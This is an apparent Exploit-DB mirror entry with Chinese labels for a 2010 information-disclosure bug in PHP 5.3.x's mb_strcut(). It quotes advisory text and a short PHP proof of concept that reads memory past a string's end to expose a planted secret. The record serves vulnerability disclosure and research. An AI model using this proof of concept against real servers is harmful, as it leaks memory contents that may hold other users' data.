PHP 5.3.x – ‘mb_strcut()’ Information Disclosure

  • 作者: Mateusz Kocielski
    日期: 2010-11-07
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/34979/
  • # source: https://www.securityfocus.com/bid/44727/info
    #
    # PHP is prone to an information-disclosure vulnerability.
    #
    # Attackers can exploit this issue to obtain sensitive information that may lead to further attacks. 
    #
    
    <?php
    $b = "bbbbbbbbbbb";
    str_repeat("THIS IS A SECRET MESSAGE, ISN'T IT?", 1);
    $var3 = mb_strcut($b, 0, 1000);
    echo $var3;
    ?>